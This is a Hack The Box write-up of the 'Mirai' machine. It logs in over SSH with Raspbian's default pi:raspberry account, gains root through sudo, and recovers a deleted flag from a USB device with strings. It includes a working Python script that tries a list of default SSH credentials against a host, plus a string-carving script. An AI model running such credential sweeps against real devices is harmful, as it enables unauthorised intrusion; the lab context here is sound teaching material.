Hack the box - Mirai

May 25, 2019 07:24 · 722 words · 4 minute read tutorial writeup ctf

If you have never heard of Hack The Box before, I recommend reading my first writeup, on the Lame box.

Mirai Box


Mirai was a botnet that used default credentials to compromise and infect a huge number of IoT devices. This box is inspired by it: we will exploit a device that still runs with its default credentials.

Nmap

We start, as usual, with a port scan using nmap.

[Screenshot: nmap results]

HTTP server

There is an HTTP server that could be interesting.

We open http://10.10.10.48/ in a browser. It serves only a blank page.

DirBuster

We use DirBuster to brute-force the site's directory tree.

[Screenshot: DirBuster configuration]

A few seconds later, a few results appear.

[Screenshot: DirBuster results]

We navigate to http://10.10.10.48/admin/ and discover that it is the Pi-hole administration page. Since the box name Mirai hints that the solution probably involves default credentials, maybe we can find a default password for Pi-hole. But after some searching, it turns out that Pi-hole has no default password: the web interface password is generated at install time.

Default credentials

However, we have not yet said our last word on this. As the name Pi-hole suggests, it is probably hosted on a Raspberry Pi, and Raspbian ships with a well-known default account: username pi, password raspberry. Let's try it over SSH.

~ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $

Bingo, we are connected! The login banner even confirms the finding: the default password for pi has never been changed. We can already grab the user flag, located at /home/pi/Desktop/user.txt.
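The whole box turns on a single check: does the host still accept a vendor default password over SSH? Here is that check as an added example of my own (not code from the box author, Pi-hole or Raspbian): a small Python script that walks a list of default SSH credentials and stops at the first pair that logs in. Only pi:raspberry comes from this writeup; the other pairs in the list, the fallback target 10.10.10.48 and the use of paramiko for the real login are my assumptions.

```python
"""Check whether a host still accepts well-known default SSH credentials.

Added example, not code from the writeup. The real login uses paramiko
(third-party), imported lazily so the module loads and the loop can be
exercised without it.
"""
from typing import Callable, Iterable, Optional, Tuple

Credential = Tuple[str, str]
LoginFn = Callable[[str, int, str, str], bool]

# Only pi:raspberry appears in the writeup. The remaining pairs are assumed
# examples of the vendor defaults a Mirai-style scanner cycles through.
DEFAULT_CREDENTIALS: Tuple[Credential, ...] = (
    ("pi", "raspberry"),   # Raspbian default account
    ("root", "root"),      # assumed
    ("admin", "admin"),    # assumed
)


def ssh_password_login(host: str, port: int, username: str, password: str) -> bool:
    """Return True if an SSH password login succeeds, False on bad credentials.

    Other failures (unreachable host, key exchange errors) propagate, so a
    dead host is never mistaken for a hardened one.
    """
    import paramiko  # third-party; lazy import so the rest works without it

    client = paramiko.SSHClient()
    # Accept unknown host keys, exactly like answering "yes" at the ssh
    # fingerprint prompt. Fine when auditing your own fleet, a MITM risk elsewhere.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(
            host, port=port, username=username, password=password,
            timeout=5, allow_agent=False, look_for_keys=False,
        )
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()


def find_default_credentials(
    host: str,
    candidates: Iterable[Credential] = DEFAULT_CREDENTIALS,
    port: int = 22,
    login: LoginFn = ssh_password_login,
) -> Optional[Credential]:
    """Try each candidate pair in order; return the first that logs in, else None.

    `login` is injectable so the loop can be tested without a network. The
    loop stops at the first hit: on a real target, hammering on just trips
    lockout policies.
    """
    for username, password in candidates:
        if login(host, port, username, password):
            return (username, password)
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.48"  # assumed default
    hit = find_default_credentials(target)
    if hit:
        print(f"{target}: accepts default credentials {hit[0]}:{hit[1]}")
    else:
        print(f"{target}: no default credentials accepted")
```

Run it only against hosts you own or are authorised to test. The point of the injectable `login` is that the same loop can drive a fake login in a test, or a different protocol (telnet, an HTTP form) on a device that does not speak SSH.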

Root

We can now switch to the root user. On a stock Raspbian install the pi user can run sudo without a password, so no further credentials are needed:

sudo su -

Let's now cat root.txt:

[Screenshot: the contents of root.txt]

Okay… 🤦

Retrieving the flag in the backup

The content of root.txt says that there is a backup on his USB drive. So we run df to see which filesystems are mounted and try to locate the device.

root@raspberrypi:~# df -lh
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000
root@raspberrypi:~#

The USB drive should be this one: /dev/sdb, an 8.7M filesystem mounted on /media/usbstick.

Let's navigate to the USB stick's mount point:

cd /media/usbstick

[Screenshot: the contents of /media/usbstick]

Okay okay… 🤦🤦

Retrieving the removed flag

There is a lost+found directory in /media/usbstick, but there is nothing in it.

So how do we get the flag back? Deleting a file on an ext filesystem only unlinks it: the data blocks are not wiped and stay on the device until they are reused, so the content is probably still there. Fortunately, on a Unix system we can read the block device as a file, in our case /dev/sdb. We simply run strings over the raw device to pull out every printable string it still contains.

root@raspberrypi:/media/usbstick/lost+found# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
THIS_IS_THE_ROOT_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

Bingo! We get the root flag. The box is now done 👏

(In the strings dump I replaced the root flag with THIS_IS_THE_ROOT_FLAG. It would be too easy if I showed it here and let you copy-paste it into HTB. If you want it, go get it yourself: practice!)
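What strings did for us above, as an added Python example of my own rather than the writeup's command: carve every printable run out of a raw device image together with its byte offset (what `strings -t x /dev/sdb` prints), then match the HTB flag format, 32 hex characters, so you do not have to eyeball the dump. The image it runs on is constructed to mimic the stick: zero-padded directory entries carrying the file names seen in the dump, then the data blocks of the two deleted files, still intact because deletion only unlinks them. The flag value in it is fake, and the block layout is my assumption, not the real stick's geometry.

```python
"""Carve printable strings out of a raw block-device image and look for the flag.

Added example, not code from the writeup. It reproduces what
`strings -t x /dev/sdb` gives you (each string with its byte offset), then
applies the HTB flag pattern, so a hit can be traced back to a block on disk.
The sample image below is constructed and the flag value in it is fake.
"""
import random
import re
from typing import Iterator, Optional, Tuple

MIN_LEN = 4  # GNU strings' default minimum length
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
FLAG_RE = re.compile(r"\b[0-9a-f]{32}\b")  # HTB flags are 32 lowercase hex chars
BLOCK = 512


def carve_strings(data: bytes, min_len: int = MIN_LEN) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for every run of printable ASCII at least min_len long."""
    pattern = PRINTABLE_RUN if min_len == MIN_LEN else re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in pattern.finditer(data):
        yield m.start(), m.group().decode("ascii")


def find_flag(data: bytes) -> Optional[Tuple[int, str]]:
    """Return (byte offset, flag) of the first HTB-style flag in the image, or None."""
    for offset, text in carve_strings(data):
        m = FLAG_RE.search(text)
        if m:
            return offset + m.start(), m.group()
    return None


def find_flag_on_device(path: str) -> Optional[Tuple[int, str]]:
    """Same thing on a device node or dd image. Reading the whole thing is fine
    for an 8.7M stick; a large disk would need chunked reads with overlap."""
    with open(path, "rb") as f:
        return find_flag(f.read())


FAKE_FLAG = "deadbeef" * 4  # 32 hex chars, obviously not a real flag


def build_sample_image() -> bytes:
    """Constructed stand-in for /dev/sdb (assumed layout, not the real stick).

    On ext2/3/4, rm unlinks the directory entry and frees the inode; the data
    blocks are not zeroed. So after the deletion the stick still holds the
    directory names and, further on, the untouched contents of both files.
    """
    rnd = random.Random(1337)  # fixed seed so the offsets are reproducible

    def filler(n: int) -> bytes:
        return bytes(rnd.getrandbits(8) for _ in range(n))

    image = bytearray()
    image += b"\x00" * (2 * BLOCK)              # boot area / superblock stand-in
    image += filler(2 * BLOCK)                  # inode table stand-in, random bytes
    names = [b"/media/usbstick", b"lost+found", b"root.txt", b"damnit.txt"]
    image += b"\x00".join(names).ljust(BLOCK, b"\x00")        # directory entries
    image += (FAKE_FLAG + "\n").encode().ljust(BLOCK, b"\x00")  # deleted root.txt
    note = (b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
            b"Do you know if there is any way to get them back?\n-James\n")
    image += note.ljust(BLOCK, b"\x00")         # deleted damnit.txt
    image += filler(2 * BLOCK)                  # never-used blocks
    return bytes(image)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    for offset, text in carve_strings(data):
        print(f"{offset:08x}  {text}")
    print("flag:", find_flag(data))
```

Point `find_flag_on_device` at /dev/sdb (as root) or, better, at a dd image of it: reading the live device is harmless, but any write to the stick risks reusing the freed blocks, so image first when the data matters. The offset is the useful extra over plain strings: it tells you which block held the file, which is what you would hand to debugfs or testdisk if you wanted the whole file back rather than one line of it.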
